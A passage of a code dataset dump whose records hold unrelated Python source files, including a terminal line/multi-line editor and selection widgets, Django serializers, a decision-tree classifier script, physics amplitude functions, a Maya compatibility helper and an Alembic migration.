super().invoke(*args, **kwargs)\n except Abort:\n fail = True\n else:\n if fail:\n return\n fail = False\n\n if fail:\n self._io.ring()\n\n return fail\n\n\nclass WindowView:\n\n \"\"\"\n ABC for classes implementing something that can be partially viewed.\n \"\"\"\n\n __slots__ = () # ('_index', '_lower', '_bound') on each subclass\n\n def __init__(self, bound):\n\n self._index = 0\n self._lower = 0\n self._bound = bound\n\n @property\n def _upper(self):\n\n return self._lower + self._bound\n\n @property\n def _among(self):\n\n return self._index - self._lower\n\n @property\n def among(self):\n\n return self._among\n\n @property\n def index(self):\n\n return self._index\n\n def _calibrate(self):\n\n if self._index < self._lower:\n # |[abc] <- [|ab]c\n self._lower = self._index\n elif self._index > self._upper:\n # [abc]| -> a[bc|]\n self._lower = self._index - self._bound\n else:\n return False\n\n return True\n\n def _resize(self, size):\n\n bound = self._bound + size\n\n if bound < 0:\n raise ValueError('bound would be negative')\n\n self._bound += size\n\n if size > 0:\n self._lower = max(0, self._lower - size)\n\n self._calibrate()\n\n def _reset(self):\n\n self._index = 0\n self._lower = 0\n\n\nclass Tool(WindowView, helpers.Handle):\n\n \"\"\"\n ABC for partially-viewable handlers.\n \"\"\"\n\n __slots__ = ('_index', '_lower', '_bound', '_io', '_cursor')\n\n def __init__(self, io, cursor, bound, *args, **kwargs):\n\n WindowView.__init__(self, bound)\n helpers.Handle.__init__(self, *args, **kwargs)\n\n self._io = io\n self._cursor = cursor\n\n def _clear(self):\n\n raise NotImplementedError()\n\n def clear(self):\n\n self._clear()\n\n def _draw(self, lower):\n\n raise NotImplementedError()\n\n def draw(self):\n\n self._draw(self._lower)\n\n def _focus(self):\n\n raise NotImplementedError()\n\n def focus(self):\n\n self._focus()\n\n def _redraw(self, skip = False):\n\n if not skip:\n self._clear()\n\n self._draw(self._lower)\n\n self._focus()\n\n def resize(self, size, full = True):\n\n if full:\n self._clear()\n\n self._resize(size)\n\n if full:\n self._redraw(skip = True)\n\n def _move_y(self, up, size):\n\n pass\n\n def _e_move_y(self, up, size):\n\n self._move_y(up, size)\n\n self._dispatch('move_y', up, size)\n\n @wrapio.event(Translator.Event.move_y)\n def _nnc(self, up):\n\n self._e_move_y(up, 1)\n\n def _move_x(self, left, size):\n\n pass\n\n def _e_move_x(self, left, size):\n\n self._move_x(left, size)\n\n self._dispatch('move_x', left, size)\n\n @wrapio.event(Translator.Event.move_x)\n def _nnc(self, left):\n\n self._e_move_x(left, 1)\n\n def _jump_x(self, left):\n\n pass\n\n def _e_jump_x(self, left):\n\n self._jump_x(left)\n\n self._dispatch('jump_x', left)\n\n @wrapio.event(Translator.Event.jump_x)\n def _nnc(self, left):\n\n self._e_jump_x(left)\n\n def _tab(self):\n\n pass\n\n def _e_tab(self):\n\n self._tab()\n\n self._dispatch('tab')\n\n def _insert(self, runes):\n\n pass\n\n def _e_insert(self, runes):\n\n if '\\t' in runes:\n self._e_tab()\n return\n\n runes = self._insert(runes)\n\n self._dispatch('insert', runes)\n\n return runes\n\n def insert(self, runes):\n\n runes = self._e_insert(runes)\n\n return runes\n\n @wrapio.event(Translator.Event.insert)\n def _nnc(self, rune):\n\n runes = (rune,)\n\n self._e_insert(runes)\n\n def _delete(self, left, size):\n\n pass\n\n def _e_delete(self, left, size):\n\n self._delete(left, size)\n\n self._dispatch('delete', left, size)\n\n def delete(self, left, size):\n\n self._e_delete(left, size)\n\n 
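# key events always delete a single rune; direct callers of delete() may pass any size\n    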
@wrapio.event(Translator.Event.delete)\n def _nnc(self, left):\n\n self._e_delete(left, 1)\n\n def _submit(self):\n\n self._dispatch('submit')\n\n def _enter(self):\n\n raise NotImplementedError()\n\n @wrapio.event(Translator.Event.enter)\n def _nnc(self, rune):\n\n self._enter()\n\n\ndef _clean(value):\n\n value = helpers.seq.clean(value)\n value = helpers.clean(value)\n\n return value\n\n\nclass LineEditor(Tool):\n\n \"\"\"\n Use for editing a single line of text.\n\n Does not support line breaks or moving vertically.\n \"\"\"\n\n __slots__ = ('_limit', '_funnel', '_buffer')\n\n def __init__(self,\n io,\n cursor,\n width,\n limit,\n funnel,\n *args,\n **kwargs):\n\n super().__init__(io, cursor, width, **kwargs)\n\n self._limit = limit\n\n self._funnel = funnel\n\n self._buffer = []\n\n @property\n def buffer(self):\n\n return self._buffer\n\n def _place(self):\n\n self._cursor.left(self._among)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.erase()\n\n def _transform(self, rune):\n\n rune = self._funnel(rune)\n\n if not len(rune) == 1:\n raise RuntimeError('rune must be of size 1')\n\n if not rune.isprintable():\n raise RuntimeError('rune must be printable')\n\n return rune\n\n def _show(self, runes):\n\n if self._funnel:\n runes = map(self._transform, runes)\n\n runes = tuple(runes)\n\n value = ''.join(runes)\n\n self._io.send(value)\n\n def _chunk(self, lower):\n\n runes = self._buffer[lower:self._upper]\n\n return runes\n\n def _draw(self, lower):\n\n runes = self._chunk(lower)\n\n self._show(runes)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n size = self._shown - self._among\n\n self._cursor.left(size)\n\n def _move_x(self, left, size):\n\n if left:\n limit = self._index\n else:\n limit = len(self._buffer) - self._index\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n if left:\n index = self._index - size\n limit = self._among\n self._cursor.left(min(limit, size))\n else:\n index = self._index + size\n limit = self._shown - self._among\n self._cursor.right(min(limit, size))\n\n self._index = index\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n\n return change\n\n def move(self, left, size):\n\n self._move_x(left, size)\n\n def _jump_x_left(self):\n\n limit = 0\n\n stop = self._index - 1\n\n if stop < limit:\n raise Abort()\n\n indexes = []\n for block in _blocks:\n try:\n index = helpers.rindex(self._buffer, block, 0, stop)\n except ValueError:\n continue\n indexes.append(index + 1)\n else:\n indexes.append(limit)\n\n size = min(self._index - index for index in indexes)\n\n self._move_x(True, size)\n\n def _jump_x_right(self):\n\n limit = len(self._buffer)\n\n start = self._index + 1\n\n if start > limit:\n raise Abort()\n\n indexes = []\n for block in _blocks:\n try:\n index = self._buffer.index(block, start)\n except ValueError:\n continue\n indexes.append(index)\n else:\n indexes.append(limit)\n\n size = min(index - self._index for index in indexes)\n\n self._move_x(False, size)\n\n def _jump_x(self, left):\n\n if left:\n self._jump_x_left()\n else:\n self._jump_x_right()\n\n def jump(self, left):\n\n self._jump_x(left)\n\n def _ensure(self, runes):\n\n value = ''.join(runes)\n value = _clean(value)\n\n return value\n\n def _insert(self, runes):\n\n runes = self._ensure(runes)\n runes = tuple(runes)\n\n esize = len(runes)\n osize = len(self._buffer)\n nsize = osize + esize\n\n if not self._limit is None and nsize > self._limit:\n raise Abort()\n\n start = self._index\n\n for 
(index, rune) in enumerate(runes):\n self._buffer.insert(start + index, rune)\n\n among = not start == osize\n\n self._index = start + esize\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n elif among:\n self._draw(start)\n self._focus()\n else:\n self._show(runes)\n\n return runes\n\n def _delete(self, left, size):\n\n if left:\n self._move_x(True, size)\n\n limit = len(self._buffer) - self._index\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n for _ in range(size):\n del self._buffer[self._index]\n\n self._cursor.erase()\n\n self._draw(self._index)\n\n self._focus()\n\n def _enter(self):\n\n self._submit()\n\n\nclass Originful:\n\n __slots__ = () # ('_origin',) on each subclass\n\n def _originate(self):\n\n (cy, cx) = self._cursor.locate()\n\n self._origin = cx - 1\n\n\nclass MultiLineEditor(Tool, Originful):\n\n \"\"\"\n Use for editing multiple lines of text.\n\n Supports line breaks or moving vertically.\n \"\"\"\n\n __slots__ = ('_origin', '_finchk', '_subs', '_make', '_limit', '_indent')\n\n def __init__(self,\n io,\n cursor,\n finchk,\n height,\n width,\n limit,\n funnel,\n indent,\n *args,\n **kwargs):\n\n Tool.__init__(self, io, cursor, height - 1, *args, **kwargs)\n\n self._finchk = finchk\n\n make = lambda: LineEditor(io, cursor, width, None, funnel)\n\n self._subs = [make()]\n\n self._make = make\n\n self._limit = limit\n\n self._indent = indent\n\n self._originate()\n\n @property\n def _sub(self):\n\n return self._subs[self._index]\n\n @property\n def subs(self):\n\n return self._subs\n\n def _place(self):\n\n self._cursor.last(self._among)\n self._cursor.right(self._origin)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.clear()\n\n def _chunk(self, lower):\n\n upper = self._upper + 1\n\n runes = self._subs[lower:upper]\n\n return runes\n\n def _draw(self, lower):\n\n self._originate()\n\n subs = self._chunk(lower)\n\n last = len(subs) - 1\n for (index, sub) in enumerate(subs):\n sub.draw()\n if index == last:\n break\n self._io.send(os.linesep)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n # if 1 shown and among 0, then move 0\n ysize = self._shown - self._among - 1\n\n self._cursor.last(ysize)\n\n xsize = self._sub.among\n\n if not self._among:\n xsize += self._origin\n\n self._cursor.right(xsize)\n\n _SpotType = enum.Enum('SpotType', 'match left right')\n\n def _spot(self, old, new, type):\n\n to_left = - new.index\n to_right = len(new.buffer) + to_left\n\n if type is self._SpotType.match:\n difference = old.index - new.index\n size = max(to_left, min(to_right, difference))\n elif type is self._SpotType.left:\n size = to_left\n elif type is self._SpotType.right:\n size = to_right\n else:\n raise ValueError('unknown move type')\n\n new.move(size < 0, abs(size))\n\n def _move_y(self, up, size, type = _SpotType.match):\n\n if up:\n limit = self._index\n else:\n # if 1 sub and index 0, then limit is 0\n limit = len(self._subs) - self._index - 1\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n if up:\n index = self._index - size\n limit = self._among\n self._cursor.last(min(limit, size))\n else:\n index = self._index + size\n limit = self._shown - self._among - 1\n self._cursor.next(min(limit, size))\n\n old = self._sub\n self._index = index\n new = self._sub\n\n xsize = new.among\n if not self._among:\n xsize += self._origin\n self._cursor.right(xsize)\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n\n if not type is None:\n self._spot(old, 
new, type)\n\n def _rcut(self, left):\n\n if left:\n (*subs, sub) = self._subs[:self._index + 1]\n buffer = sub.buffer[:sub.index]\n subs = reversed(subs)\n else:\n (sub, *subs) = self._subs[self._index:]\n buffer = sub.buffer[sub.index:]\n\n buffers = (buffer, *(sub.buffer for sub in subs))\n\n return buffers\n\n def _rmsr(self, buffers, xsize):\n\n ysize = 0\n nsize = xsize\n for buffer in buffers:\n nsize -= len(buffer) + 1\n if nsize < 0:\n break\n xsize = nsize\n ysize += 1\n\n return (ysize, xsize)\n\n def _rclc(self, left, xsize):\n\n buffers = self._rcut(left)\n\n # remove one to account for current line\n limit = sum(map(len, buffers)) + len(buffers) - 1\n\n excess = xsize - limit\n if excess > 0:\n raise Abort(excess)\n\n (ysize, xsize) = self._rmsr(buffers, xsize)\n\n return (ysize, xsize)\n\n def _move_x(self, left, xsize):\n\n (ysize, xsize) = self._rclc(left, xsize)\n\n if ysize:\n type = self._SpotType.right if left else self._SpotType.left\n self._move_y(left, ysize, type)\n\n self._sub.move(left, xsize)\n\n return (ysize, xsize)\n\n def move(self, left, size):\n\n self._move_x(left, size)\n\n def _jump_x(self, left):\n\n try:\n self._sub.jump(left)\n except Abort:\n self._move_x(left, 1)\n\n def _ensure(self, runes):\n\n esize = len(runes)\n buffers = tuple(sub.buffer for sub in self._subs)\n osize = sum(map(len, buffers)) + len(buffers) - 1\n nsize = osize + esize\n\n if not self._limit is None and nsize > self._limit:\n raise Abort()\n\n def _tab(self):\n\n self._e_insert((' ',) * self._indent)\n\n def _insert(self, runes):\n\n values = helpers.split(runes, os.linesep)\n values = tuple(values)\n\n runes = tuple(itertools.chain.from_iterable(values))\n\n self._ensure(runes)\n\n last = len(values) - 1\n buffer = []\n for (index, runes) in enumerate(values):\n runes = self._sub.insert(runes)\n buffer.extend(runes)\n if index == last:\n break\n self._newsub()\n buffer.append(os.linesep)\n\n return buffer\n\n def _delete(self, left, size):\n\n if left:\n self._move_x(True, size)\n\n (ysize, xsize) = self._rclc(False, size)\n\n kli = self._index + 1\n sub = self._sub\n\n for index in range(ysize):\n nsub = self._subs.pop(kli)\n sub.buffer.extend(nsub.buffer)\n\n if ysize:\n self._redraw()\n\n sub.delete(False, size - ysize)\n\n def _newsub(self):\n\n old = self._sub\n\n new = self._make()\n\n while True:\n try:\n rune = old.buffer.pop(old.index)\n except IndexError:\n break\n new.buffer.append(rune)\n\n last = self._index == len(self._subs) - 1 and self._among < self._bound\n full = not last\n\n if full:\n self._clear()\n else:\n self._cursor.erase()\n\n index = self._index + 1\n\n self._subs.insert(index, new)\n\n self._index = index\n\n runes = (os.linesep,)\n\n if full:\n self._calibrate()\n self._redraw(skip = True)\n else:\n self._io.send(*runes)\n self._draw(self._index)\n self._focus()\n\n self._dispatch('insert', runes)\n\n def newsub(self):\n\n self._newsub()\n\n def _enter(self):\n\n done = self._finchk()\n\n (self._submit if done else self._newsub)()\n\n\nclass Select(Tool, Originful):\n\n \"\"\"\n Use for cycling through and selecting options.\n \"\"\"\n\n __slots__ = ('_origin', '_options', '_visible', '_changed', '_buffer',\n '_width', '_prefix', '_indent', '_funnel', '_filter')\n\n def __init__(self,\n io,\n cursor,\n height,\n width,\n options,\n prefix,\n indent,\n funnel,\n filter,\n *args,\n **kwargs):\n\n Tool.__init__(self, io, cursor, height - 1, *args, **kwargs)\n\n self._options = options\n self._visible = tuple(range(len(options)))\n self._changed = 
{}\n\n self._buffer = []\n\n self._width = width\n\n self._prefix = prefix\n self._indent = indent\n\n self._funnel = funnel\n self._filter = filter\n\n self._originate()\n\n @property\n def buffer(self):\n\n return self._buffer\n\n def _place(self):\n\n self._cursor.last(self._among)\n self._cursor.right(self._origin)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.clear()\n\n def _tran(self, index, current, option):\n\n return option\n\n def _chunk(self, lower):\n\n return self._visible[lower:self._upper + 1]\n\n def _fetch(self, index, current):\n\n option = self._options[index][:self._width]\n\n if current:\n try:\n option = self._changed[index]\n except KeyError:\n if self._funnel:\n option = self._funnel(index, option)\n self._changed[index] = option\n\n prefix = self._prefix if current else ' ' * self._indent\n\n option = prefix + self._tran(index, current, option)\n\n return option\n\n def _show(self, index, current):\n\n self._cursor.erase()\n\n option = self._fetch(index, current)\n\n self._io.send(option)\n\n self._cursor.goto(0)\n\n def _draw(self, lower):\n\n indexes = self._chunk(lower)\n\n options = []\n for (cindex, oindex) in enumerate(indexes, start = lower):\n current = cindex == self._index\n option = self._fetch(oindex, current)\n options.append(option)\n\n result = os.linesep.join(options)\n\n self._io.send(result)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n # if 1 shown and among 0, then move 0\n ysize = self._shown - self._among - 1\n\n self._cursor.last(ysize)\n\n xsize = 0 # doesn't matter\n\n if not self._among:\n xsize += self._origin\n\n self._cursor.right(xsize)\n\n def _slide(self, up, size):\n\n limit = len(self._visible)\n\n size = size % limit\n\n index = self._index + (- size if up else size)\n\n if index < 0:\n index = limit - 1\n else:\n extra = index - limit\n if not extra < 0:\n index = extra\n\n size = index - self._index\n\n up = size < 0\n size = abs(size)\n\n return (up, size, index)\n\n def _move_y(self, up, size):\n\n (up, size, index) = self._slide(up, size)\n\n if up:\n limit = self._index\n else:\n # if 1 sub and index 0, then limit is 0\n limit = len(self._visible) - self._index - 1\n\n # no need to check excess, ``_slide`` ensures\n\n self._show(self._visible[self._index], False)\n\n if up:\n limit = self._among\n self._cursor.last(min(limit, size))\n else:\n limit = self._shown - self._among - 1\n self._cursor.next(min(limit, size))\n\n self._index = index\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n else:\n self._show(self._visible[index], True)\n\n def move(self, up, size):\n\n self._move_y(up, size)\n\n def _specify(self, new):\n\n argument = ''.join(self._buffer)\n\n if new:\n indexes = self._visible\n options = (self._options[index] for index in indexes)\n pairs = zip(indexes, options)\n pairs = self._filter(pairs, argument)\n (indexes, options) = zip(*pairs)\n else:\n indexes = range(len(self._options))\n\n self._clear()\n\n self._visible = indexes\n\n self._index = 0\n\n self._calibrate()\n\n self._redraw(skip = True)\n\n self._dispatch('filter', argument)\n\n def _insert(self, runes):\n\n save = self._buffer.copy()\n\n value = ''.join(runes)\n value = _clean(value)\n\n self._buffer.extend(value)\n\n try:\n self._specify(True)\n except ValueError:\n self._buffer.clear()\n self._buffer.extend(save)\n raise Abort()\n\n def _delete(self, left, size):\n\n if not self._buffer:\n raise Abort()\n\n self._buffer.clear()\n\n self._specify(False)\n\n def 
_enter(self):\n\n self._submit()\n\n\nclass MultiSelect(Select):\n\n __slots__ = ('_unpin', '_pin', '_chosen')\n\n def __init__(self, unpin, pin, indexes, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._unpin = unpin\n self._pin = pin\n\n self._chosen = set(indexes)\n\n @property\n def indexes(self):\n\n return self._chosen\n\n def _tran(self, index, current, option):\n\n signal = self._pin if index in self._chosen else self._unpin\n\n return signal + super()._tran(index, current, option)\n\n def _add(self, index, full):\n\n if full:\n limit = len(self._options)\n if len(self._chosen) == limit:\n raise Abort()\n self._chosen.update(range(limit))\n else:\n self._chosen.add(index)\n\n def _pop(self, index, full):\n\n if full:\n if not self._chosen:\n raise Abort()\n self._chosen.clear()\n else:\n self._chosen.remove(index)\n\n def _inform(self, new):\n\n index = self._visible[self._index]\n\n exists = index in self._chosen\n full = exists if new else not exists\n\n (self._add if new else self._pop)(index, full)\n\n self._redraw()\n\n self._dispatch('inform', new, full)\n\n def _move_x(self, left, size):\n\n new = not left\n\n self._inform(new)\n","sub_path":"macOS/Xcode/Maestral/Maestral/app_packages/survey/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":27136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604098950","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User, Group\n\nfrom . import models\n\n\n#\n# Auth and permissions\n#\n\nclass UserSerializer(serializers.ModelSerializer):\n groups = serializers.StringRelatedField(many=True)\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'email', 'groups',)\n \n #def restore_object(self, attrs, instance=None):\n # # call set_password on user object. 
Without this\n # # the password will be stored in plain text.\n # user = super(UserSerializer, self).restore_object(attrs, instance)\n # user.set_password(attrs['password'])\n # return user\n\n#\n# Search Page Serializers\n#\n\nclass SearchPage_Serializer(serializers.ModelSerializer):\n tfcs = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n \n class Meta: \n fields = (\n 'id','origin', 'tlc', 'tlctype','fixedprice','printlabel','specifiedprof',\n 'securitylevel','queryflag','tlcname','fee1',\n 'tfcs'\n )\n model = models.TLC\n\n\n#\n# Testing things out - Serializers\n#\n\nclass Locations_Serializer(serializers.ModelSerializer):\n class Meta:\n fields = (\n 'id','subsectioncode','subsection','department','location','address','postcode','telephone','contact',\n 'url','notes','halo','wsl','referral','dynamics_code','active',\n )\n read_only_fields = ('id',)\n model = models.Locations\n\nclass LOINC_Serializer(serializers.ModelSerializer):\n class Meta:\n fields = (\n 'LOINC_NUM','LONG_COMMON_NAME','COMPONENT'\n )\n model = models.LOINC\n\nclass Map_Serializer(serializers.ModelSerializer):\n loinc = serializers.StringRelatedField(many=False, read_only=True) #LOINC_Serializer(many=False, read_only=True)\n loc1 = Locations_Serializer(many=False, read_only=True)\n loc2 = serializers.StringRelatedField(many=False, read_only=True) #Locations_Serializer(many=False, read_only=True)\n \n class Meta:\n fields = (\n 'origin','tfc','loinc','loc1','loc2','container','result_type'\n )\n read_only_fields = ('origin','tfc')\n model = models.Map\n \n\nclass Form_Serializer(serializers.ModelSerializer):\n map_set = Map_Serializer(many=True, read_only=True)\n \n class Meta:\n fields = (\n 'origin','tfc','wrksection','testname','units','functions','reflab',\n 'ref','flags','repsection','dontwaitforme','rownum','map_set'\n )\n model = models.Form\n\n\nclass TLC_Serializer(serializers.ModelSerializer):\n tfcs = Form_Serializer(many=True, read_only=True)\n \n class Meta: \n fields = (\n 'id','origin', 'tlc', \n 'tlctype','fixedprice','printlabel','specifiedprof',\n 'securitylevel','queryflag','tlcname','fee1',\n 'tfcs'\n )\n model = models.TLC","sub_path":"djangoapi/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"121950461","text":"import numpy as np\nimport csv\nreader = csv.reader(open('dt_data.data', 'r'))\ndicts = []\n\n# Read in training feature\nfor row in reader:\n\tdict = {}\n\tdict['age'] = long(row[0])\n\tdict['workclass'] = row[1]\n\tdict['fnlwgt'] = long(row[2])\n\tdict['education'] = row[3]\n\tdict['education-num'] = long(row[4])\n\tdict['marital-status'] = row[5]\n\tdict['occupation'] = row[6]\n\tdict['relationship'] = row[7]\n\tdict['race'] = row[8]\n\tdict['sex'] = row[9]\n\tdict['capital-gain'] = long(row[10])\n\tdict['capital-loss'] = long(row[11])\n\tdict['hours-per-week'] = long(row[12])\n\tdict['native-country'] = row[13]\n\tdicts.append(dict)\n\n# Import and initialize dictionary vetorizer\nfrom sklearn.feature_extraction import DictVectorizer\nvec = DictVectorizer()\ndata = vec.fit_transform(dicts).toarray()\nprint(len(data))\nprint(len(data[0]))\n\n# Read in training label\nreader = csv.reader(open('dt_label.data', 'r'))\nlabel0 = []\nfor row in reader:\n\tlabel0.append(row)\nprint(len(label0))\nlabel = np.array(label0)\n\n# Import and initialize data model\nfrom sklearn import tree\nclf = 
tree.DecisionTreeClassifier()\nclf.fit(data, label)\n\na = np.array(['L','H'])\n\nprint(clf.predict(data[6])==a[0])\nprint(clf.predict(data[7])==a[1])\n\n# Read in testing feature\nreader = csv.reader(open('dt_data.test', 'r'))\ndicts2 = []\nfor row in reader:\n\tdict = {}\n\tdict['age'] = long(row[0])\n\tdict['workclass'] = row[1]\n\tdict['fnlwgt'] = long(row[2])\n\tdict['education'] = row[3]\n\tdict['education-num'] = long(row[4])\n\tdict['marital-status'] = row[5]\n\tdict['occupation'] = row[6]\n\tdict['relationship'] = row[7]\n\tdict['race'] = row[8]\n\tdict['sex'] = row[9]\n\tdict['capital-gain'] = long(row[10])\n\tdict['capital-loss'] = long(row[11])\n\tdict['hours-per-week'] = long(row[12])\n\tdict['native-country'] = row[13]\n\tdicts2.append(dict)\n\ntestdata = vec.fit_transform(dicts2).toarray()\nprint(len(testdata))\nprint(len(testdata[0]))\n\n# Read in testing label\nreader = csv.reader(open('dt_label.test', 'r'))\ntestlabel0 = []\nfor row in reader:\n\ttestlabel0.append(row)\nprint(len(testlabel0))\ntestlabel = np.array(testlabel0)\n\n# Predict and calculate accuracy\ncount = 0\nfor i in range(0,len(testdata)):\n\tif(clf.predict(testdata[i])==testlabel[i]):\n\t\tcount = count+1\nprint(count)\nprint(1.0*count/len(testdata))\n","sub_path":"DesitionTree.py","file_name":"DesitionTree.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"486116823","text":"import sys\nimport os\n\ndef get_codes(f):\n\tlines = f.readlines()\n\tcodes = []\n\tfor line in lines:\n\t\tif line.startswith('ABC, where D and A are spin-1/2 particles, \n and the decay proceeds via a resonance R in the AB channel (so that R is a baryon \n with spin up to 7/2). \n \"\"\"\n\n p4r = p4a + p4b\n mr = Mass(p4r)\n spinor_r = DiracSpinors(spin_r, p4r, mr)\n p4a_t = QFTObject(1, 0, tf.cast(p4a, dtype = ctype))\n p4d_t = QFTObject(1, 0, tf.cast(p4d, dtype = ctype))\n sab = Bar(spinor_a)\n sd = spinor_d\n\n if parity_r == -1 : \n sab = sab*DiracGamma5()\n if parity_d*parity_r == -1 : \n sd = DiracGamma5()*sd\n\n ampl = Complex(Const(0.), Const(0.))\n for pol_r in range(len(spinor_r)) : \n# print \"pol \", pol_r\n sr = spinor_r[pol_r]\n srb = Bar(spinor_r[pol_r])\n\n if spin_r == 1 : \n ampl += ((sab*sr)*(srb*sd)).tensor\n if spin_r == 3 : \n ampl += (((sab*sr)*p4a_t)*((srb*sd)*p4d_t)).tensor\n if spin_r == 5 : \n ampl += ((((sab*sr)*p4a_t)*p4a_t)*(((srb*sd)*p4d_t)*p4d_t)).tensor\n if spin_r == 7 : \n ampl += (((((sab*sr)*p4a_t)*p4a_t)*p4a_t)*((((srb*sd)*p4d_t)*p4d_t)*p4d_t)).tensor\n\n a = ampl/(2.*tf.cast(mr, dtype = ctype))\n\n if cache : Optimisation.cacheable_tensors += [ a ]\n\n return a\n\ndef CovariantBaryonBCDecayAmplitude(p4a, p4b, p4c, p4d, spinor_a, spinor_d, spin_r, cache = False) : \n \"\"\"\n Covariant amplitude for the decay D->ABC, where D and A are spin-1/2 particles, \n and the decay proceeds via a (integral-spin) resonance R in the BC channel \n (so that R is a meson with spin 0 or 1). 
\n \"\"\"\n p4r = p4b + p4c\n p4diff = p4b - p4c\n mr = Mass(p4r)\n\n# p4a_t = QFTObject(1, 0, tf.cast(p4a, dtype = ctype))\n# p4d_t = QFTObject(1, 0, tf.cast(p4d, dtype = ctype))\n p4diff_t = QFTObject(1, 0, tf.cast(p4diff, dtype = ctype))\n\n ampl = Complex(Const(0.), Const(0.))\n\n sab = Bar(spinor_a)\n sd = spinor_d\n\n if spin_r == 0 : \n ampl += (sab*sd).tensor\n if spin_r == 2 : \n# sab2 = sab * DiracGamma() * DiracGamma5()\n sab2 = sab * DiracGamma()\n proj = BosonProjector(2, p4r, mr)\n ampl += (((sab2 % sd)*proj)*p4diff_t).tensor\n\n# a = ampl/(2.*tf.cast(mr, dtype = ctype))\n a = ampl\n\n if cache : Optimisation.cacheable_tensors += [ a ]\n\n return a\n","sub_path":"TF/lib/CovariantFormalism.py","file_name":"CovariantFormalism.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"564577304","text":"\"\"\"Compatibility\n\nThis module is to ensure the compatibility between Maya, Avalon and Pyblish\nis maintained.\n\"\"\"\nimport maya.cmds as cmds\nimport os\n\n\ndef remove_googleapiclient():\n \"\"\"Check if the compatibility must be maintained\n\n The Maya 2018 version tries to import the `http` module from\n Maya2018\\plug-ins\\MASH\\scripts\\googleapiclient\\http.py in stead of the\n module from six.py. This import conflict causes a crash Avalon's publisher.\n This is due to Autodesk adding paths to the PYTHONPATH environment variable\n which contain modules instead of only packages.\n \"\"\"\n\n keyword = \"googleapiclient\"\n\n # reconstruct python paths\n python_paths = os.environ[\"PYTHONPATH\"].split(os.pathsep)\n paths = [path for path in python_paths if keyword not in path]\n os.environ[\"PYTHONPATH\"] = os.pathsep.join(paths)\n\n\ndef install():\n \"\"\"Run all compatibility functions\"\"\"\n if cmds.about(version=True) == \"2018\":\n remove_googleapiclient()\n","sub_path":"avalon/maya/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"254026983","text":"class Solution:\n def countBits(self, num):\n \"\"\"\n :type num: int\n :rtype: List[int]\n \"\"\"\n ans = [0]\n while len(ans) < num + 1:\n ans += [1 + x for x in ans]\n # len(ans) > num\n return ans[:num+1]\n\n# Solution:\n# 大体思路和自己的一样\n# 但是 1本身也是 1 + 前一个unit的 0\n# 每次都是 1 + 前一个unit的每一项\n# 这样可以每次更新ans,\n# 每次的ans都是计算完这个unit之后的结果\n\n# Beats: 99.78%\n# Runtime: 104ms\n# medium","sub_path":"338-Counting-Bits-update-ans.py","file_name":"338-Counting-Bits-update-ans.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"497931050","text":"\"\"\"add persons, credits\n\nRevision ID: 46cc49df2efd\nRevises: daf722ec18f0\nCreate Date: 2020-07-19 17:54:31.886640\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '46cc49df2efd'\ndown_revision = 'daf722ec18f0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('video_persons',\n sa.Column('id', sa.Text(), nullable=False),\n sa.Column('image_url', sa.Text(), nullable=True),\n sa.Column('birthday', sa.Date(), nullable=True),\n sa.Column('known_for', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('video_credits',\n sa.Column('id', sa.Text(), nullable=False),\n sa.Column('video_id', sa.Text(), nullable=False),\n sa.Column('person_id', sa.Text(), nullable=False),\n sa.Column('character', sa.Text(), nullable=True),\n sa.Column('order', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['person_id'], ['video_persons.id'], ),\n sa.ForeignKeyConstraint(['video_id'], ['videos.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('video_credits')\n op.drop_table('video_persons')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/46cc49df2efd_add_persons_credits.py","file_name":"46cc49df2efd_add_persons_credits.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"185942793","text":"'''\n8.5 Open the file mbox-short.txt and read it line by line. When you find a line\n that starts with 'From ' like the following line:\n\nFrom stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\n\nYou will parse the From line using split() and print out the second word in the\n line (i.e. the entire address of the person who sent the message). Then print\n out a count at the end.\n\nHint: make sure not to include the lines that start with 'From:'.\n\nYou can download the sample data at 